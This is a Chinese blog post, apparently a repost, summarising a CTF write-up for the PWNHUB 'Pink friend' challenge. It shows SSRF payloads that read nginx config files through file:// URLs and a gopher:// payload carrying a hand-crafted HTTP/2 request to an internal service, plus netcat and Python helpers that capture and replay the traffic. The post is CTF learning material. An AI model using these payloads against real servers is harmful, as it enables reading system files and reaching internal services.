PWNHUB-Pink friend

栏目: 服务器 · Nginx · 发布时间: 5年前

内容简介：curl –http2-prior-knowledge：可以在不升级HTTP/1.1的情况下使用HTTP2。

看了f1sh师傅的wp： pwnhub Pink friend Writeup ，Orz！感觉做法很骚，这里记录一下关键步骤。

url=file:///etc/nginx/nginx.conf
PWNHUB-Pink friend

url=file:///etc/nginx/sites-enabled/default
PWNHUB-Pink friend

使用 gopher 构造构造 http2 协议访问 172.20.0.3:8080 。

本地监听http2请求包

nc -lvvp 8000>1.txt

curl –http2-prior-knowledge：可以在不升级HTTP/1.1的情况下使用HTTP2。

$ curl --http2-prior-knowledge  http://127.0.0.1:8000/

PWNHUB-Pink friend 构造gopher协议

gopher://172.20.0.3:8080/_PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A%2500%2500%2512%2504%2500%2500%2500%2500%2500%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501%2500%2500%251E%2501%2505%2500%2500%2500%2501%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A

然后把返回的数据保存到文件 flag.txt 中

模拟HTTP2请求过程，对刚才返回的数据进行解码。

nc -lvvp 8000 < flag.txt

PWNHUB-Pink friend 也可以像f1sh师傅一样用 python 启一个socket服务。

import socket

a = open("flag.txt", "rb").read()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 8000
s.bind((host, port))

s.listen(5)
while True:
    c, addr = s.accept()
    c.send(a)

curl --http2-prior-knowledge http://127.0.0.1:8000 -v

PWNHUB-Pink friend

以上就是本文的全部内容，希望本文的内容对大家的学习或者工作能带来一定的帮助，也希望大家多多支持码农网

查看所有标签

猜你喜欢:

PWNHUB-Pink friend

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

MongoDB

Kristina Chodorow / O'Reilly Media / 2013-5-23 / USD 39.99

How does MongoDB help you manage a huMONGOus amount of data collected through your web application? With this authoritative introduction, you'll learn the many advantages of using document-oriented da......一起来看看《MongoDB》这本书的介绍吧!

码农工具